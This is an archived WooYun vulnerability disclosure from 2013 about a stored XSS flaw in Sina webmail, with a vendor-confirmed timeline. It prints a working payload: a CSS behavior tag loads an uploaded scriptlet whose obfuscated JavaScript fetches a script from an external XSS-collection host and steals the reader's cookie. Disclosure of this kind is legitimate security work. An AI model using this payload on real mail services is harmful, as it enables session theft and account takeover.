当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021270

漏洞标题:新浪邮箱存储型XSS

相关厂商:新浪

漏洞作者: shad0w

提交时间:2013-04-05 19:29

修复时间:2013-05-20 19:30

公开时间:2013-05-20 19:30

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-05: 细节已通知厂商并且等待厂商处理中
2013-04-05: 厂商已经确认,细节仅向厂商公开
2013-04-15: 细节向核心白帽子及相关领域专家公开
2013-04-25: 细节向普通白帽子公开
2013-05-05: 细节向实习白帽子公开
2013-05-20: 细节向公众公开

简要描述:

听说有礼物送:)

详细说明:

写入代码

<x style="behavior:url(test.sct)"></x>


发现没有被过滤。

1.jpg


新建一个sct文件,内容为:

<SCRIPTLET>
<IMPLEMENTS Type="Behavior"></IMPLEMENTS>
<SCRIPT Language="javascript">
alert(1);
(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(
104,116,116,112,58,47,47,120,115,115,46,116,119,47,49,48,53,50);document.body.appendChild(window.s)})();
</SCRIPT>
</SCRIPTLET>


然后上传到附件夹,下载链接为:

http://m1.mail.sina.com.cn/classic/base_download_att.php?file_name=test.sct&file_size=367.5&mid=02BB29DB41F5347D476D455DC6C699DEE600000000000002&content_type=application/octet-stream&attinfo=4-1533-2023-base64&fid=out


写入代码

<x style="behavior:url(base_download_att.php?file_name=test.sct&file_size=367.5&mid=02BB29DB41F5347D476D455DC6C699DEE600000000000002&content_type=application/octet-stream&attinfo=4-1533-2023-base64&fid=out)"></x>


打开邮件,可以看到,在IE下,XSS代码被成功执行。

4.jpg


接收到的cookie

5.jpg


漏洞证明:

见详细说明

修复方案:

:)

版权声明:转载请注明来源 shad0w@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-04-05 23:14

厂商回复:

感谢提供~

最新状态:

暂无